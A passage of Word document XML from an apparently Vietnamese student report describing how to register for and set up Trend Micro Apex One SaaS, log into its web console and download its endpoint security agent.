          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ne</w:t>
      </w:r>
      <w:r w:rsidR="002B3AFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1E8B8819" w14:textId="7C7CF26C" w:rsidR="002B3AFC" w:rsidRPr="007D5E72" w:rsidRDefault="006C1548" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào trang web của Trend Micro </w:t>
      </w:r>
      <w:r w:rsidR="0015698F" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Apex One </w:t>
      </w:r>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tại</w:t>
      </w:r>
      <w:r w:rsidR="003C3ADD" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4376FC88" w14:textId="781A7738" w:rsidR="003C3ADD" w:rsidRPr="00516001" w:rsidRDefault="00211CBF" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="002B3AFC" w:rsidRPr="004A2F93">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://www.trendmicro.com/en_nl/business/products/user-protection/sps/endpoint.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003C3ADD" w:rsidRPr="002B3AFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F7B1FF" w14:textId="69DB64B8" w:rsidR="00B41EA0" w:rsidRPr="007D5E72" w:rsidRDefault="00E80F6A" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Giao diện </w:t>
      </w:r>
      <w:r w:rsidR="002B5CE7" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>web của Trend Micro Apex One:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42109B6C" w14:textId="755FE1B0" w:rsidR="002B5CE7" w:rsidRPr="00516001" w:rsidRDefault="002B5CE7" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516001">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AFB9D82" wp14:editId="707250A1">
            <wp:extent cx="5784727" cy="3375660"/>
            <wp:effectExtent l="19050" t="19050" r="26035" b="15240"/>
            <wp:docPr id="1931018952" name="Picture 19310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52" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5800953" cy="3385129"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="089BD766" w14:textId="0D676380" w:rsidR="002B5CE7" w:rsidRPr="007D5E72" w:rsidRDefault="002B5CE7" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Click vào </w:t>
      </w:r>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Free SaaS Trial</w:t>
      </w:r>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> để đăng ký tài khoản dùng thử trong 30 ngày</w:t>
      </w:r>
      <w:r w:rsidR="007E67A1" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoặc </w:t>
      </w:r>
      <w:r w:rsidR="007E67A1" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Get pricing</w:t>
      </w:r>
      <w:r w:rsidR="007E67A1" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> để mua sản phẩm</w:t>
      </w:r>
      <w:r w:rsidR="005B6247" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB03105" w14:textId="6D2E58FB" w:rsidR="005B6247" w:rsidRPr="007D5E72" w:rsidRDefault="005B6247" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007E2B89" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">a cần lưu ý </w:t>
      </w:r>
      <w:r w:rsidR="000167EE" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tên sản phẩm đăng ký là Apex One chứ không phải tên khác vì Trend Micro có </w:t>
      </w:r>
      <w:r w:rsidR="00A726A7" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:r w:rsidR="000167EE" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> sản phẩm khác</w:t>
      </w:r>
      <w:r w:rsidR="00325D96" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> như Trend Service One</w:t>
      </w:r>
      <w:r w:rsidR="000D53EF" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, Trend Cloud One</w:t>
      </w:r>
      <w:r w:rsidR="00A726A7" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006849A0" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBABD44" w14:textId="35CF99E8" w:rsidR="00AA4FCC" w:rsidRPr="00516001" w:rsidRDefault="006C1548" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516001">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="316F6FD9" wp14:editId="58E1C814">
            <wp:extent cx="5334000" cy="3098393"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26035"/>
            <wp:docPr id="1082517602" name="Picture 1082517602"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7602" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Website&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5336565" cy="3099883"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA6714C" w14:textId="78503AD6" w:rsidR="00D94201" w:rsidRPr="00D94201" w:rsidRDefault="000F781F" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc152795835"/>
      <w:r w:rsidRPr="002B3AFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Setup Trend Micro Apex One as a Services</w:t>
      </w:r>
      <w:r w:rsidR="002275B8" w:rsidRPr="002B3AFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Apex One SaaS)</w:t>
      </w:r>
      <w:r w:rsidR="00D94201" w:rsidRPr="002B3AFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C7C31" w:rsidRPr="002B3AFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>serve</w:t>
      </w:r>
      <w:r w:rsidR="000B659F" w:rsidRPr="002B3AFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="002B3AFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="0462C838" w14:textId="5125548B" w:rsidR="00495742" w:rsidRPr="007D5E72" w:rsidRDefault="00495742" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sau khi đăng ký thành công, Apex One sẽ gửi thư về email xác nhận và Link truy cập vào giao diện Web Console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201338B4" w14:textId="47A104FB" w:rsidR="00FB4548" w:rsidRPr="00516001" w:rsidRDefault="004F29E1" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516001">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="291836AA" wp14:editId="7A591B30">
            <wp:extent cx="5238750" cy="2669199"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="17145"/>
            <wp:docPr id="1111108018" name="Picture 1111108018"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8018" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, Phông chữ, thiết kế&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="13866" b="7353"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5247359" cy="2673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8D028F" w14:textId="282E81E4" w:rsidR="00F0287D" w:rsidRPr="007D5E72" w:rsidRDefault="00F0287D" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Truy cập vào link được cung cấp</w:t>
      </w:r>
      <w:r w:rsidR="00F63655" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, sau đó ta set </w:t>
      </w:r>
      <w:r w:rsidR="005546CB" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Username và</w:t>
      </w:r>
      <w:r w:rsidR="0037388F" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005546CB" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Password để đăng nhập vào </w:t>
      </w:r>
      <w:r w:rsidR="00D424CC" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Console server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF3819C" w14:textId="7FF07F5D" w:rsidR="00D424CC" w:rsidRPr="007D5E72" w:rsidRDefault="006065C5" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Giao diện của </w:t>
      </w:r>
      <w:r w:rsidR="00A70CBC" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trend Micro Apex One SaaS</w:t>
      </w:r>
      <w:r w:rsidR="009749F6" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau khi đăng nhập thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0819B62A" w14:textId="4987C704" w:rsidR="00470005" w:rsidRPr="00516001" w:rsidRDefault="00D01E67" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516001">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="766562D5" wp14:editId="3CF91DFE">
            <wp:extent cx="5943600" cy="2740660"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="21590"/>
            <wp:docPr id="943568447" name="Picture 943568447"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8447" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, số, phần mềm&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2740660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68389F9A" w14:textId="7F0D4B38" w:rsidR="005226FA" w:rsidRPr="002B3AFC" w:rsidRDefault="0037388F" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc152795836"/>
      <w:r w:rsidRPr="002B3AFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Setup Agent</w:t>
      </w:r>
      <w:r w:rsidR="002B3AFC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0B44F030" w14:textId="0734A58C" w:rsidR="002F64F6" w:rsidRPr="007D5E72" w:rsidRDefault="00E37C56" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Để</w:t>
      </w:r>
      <w:r w:rsidR="007B4141" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> download Agent</w:t>
      </w:r>
      <w:r w:rsidR="00E01B7C" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D03FDB" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>trên giao diện của Apex One SaaS</w:t>
      </w:r>
      <w:r w:rsidR="00A17CC1" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, click vào </w:t>
      </w:r>
      <w:r w:rsidR="002F64F6" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Administration/Security Agent Download</w:t>
      </w:r>
      <w:r w:rsidR="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39731987" w14:textId="431F883E" w:rsidR="002F64F6" w:rsidRPr="00516001" w:rsidRDefault="008B66F2" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3AFC">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BBA96B4" wp14:editId="3C46CC31">
            <wp:extent cx="5943600" cy="3101340"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="22860"/>
            <wp:docPr id="1795034199" name="Picture 1795034199"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4199" name="Hình ảnh 2" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, Trang web, phần mềm&#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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F2BFA4" w14:textId="7A051D76" w:rsidR="0034066B" w:rsidRPr="007D5E72" w:rsidRDefault="007D70FD" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mô hình của nhóm chỉ sử dụng bản Free Trial nên sẽ không hỗ trợ hệ điều hành Linux mà chỉ có Windows và Mac, tuy nhiên nếu chúng ta mua sản phẩm</w:t>
      </w:r>
      <w:r w:rsidR="00E10D60" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> thì Apex One SaaS sẽ hỗ trợ cả 3 hệ điều hành trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502695CC" w14:textId="09A9FE08" w:rsidR="00944868" w:rsidRPr="007D5E72" w:rsidRDefault="00643FF2" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trong phần Installation mode,</w:t>
      </w:r>
      <w:r w:rsidR="00F01CF8" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> nếu chọn Coex</w:t>
      </w:r>
      <w:r w:rsidR="00B11E05" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ist</w:t>
      </w:r>
      <w:r w:rsidR="00CB2571" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> thì Agent sẽ cho phép hoạt động chung với những </w:t>
      </w:r>
      <w:r w:rsidR="00204443" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phần mềm bảo mật khác có trong máy endpoint, chẳng hạn như Windows Defender</w:t>
      </w:r>
      <w:r w:rsidR="00833AF7" w:rsidRPr="007D5E72">
        <w:rPr>
